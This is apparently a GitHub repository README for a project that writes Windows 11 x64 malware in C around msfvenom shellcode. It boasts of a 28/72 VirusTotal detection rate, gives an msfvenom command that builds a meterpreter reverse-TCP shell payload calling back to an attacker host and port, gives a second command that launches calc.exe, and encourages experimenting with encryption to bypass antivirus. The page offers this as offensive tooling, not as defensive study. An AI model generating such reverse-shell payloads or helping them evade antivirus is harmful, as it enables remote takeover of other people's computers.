Skip to content

MarkAppprogrammer/Malware-Windows_x64

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

11 Commits
 
 
 
 
 
 
 
 

Repository files navigation

Malware-Windows_x64

Writing different forms of malware for windows 11 x64 in C with msfvenom payloads. Code recived 28/72 Flags on Virus Total

Creation of Payloads

Use msfvenom and diffrent payloads for desired result. DO NOT COPY MY SHELLCODE. Please genrate your own shellcode for security.

Sample Shell Code Payloads:

Reverse Shell (Use Metasploit Framework afterwards) Change the port, host, and variable name

msfvenom msfvenom --platform windows --arch x64 -p windows/x64/meterpreter/reverse_tcp LHOST=0.0.0.0 LPORT=80 -f c --var-name=insertVarNameHere

Opens a Calculator

msfvenom --platform windows --arch x64 -p windows/x64/exec CMD="cmd.exe /c calc.exe" -f csharp EXITFUNC=thread

Feel free to expirment with diffrent payloads and encryption to bypass AV

About

Writing different forms of malware for windows 11 x64.

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published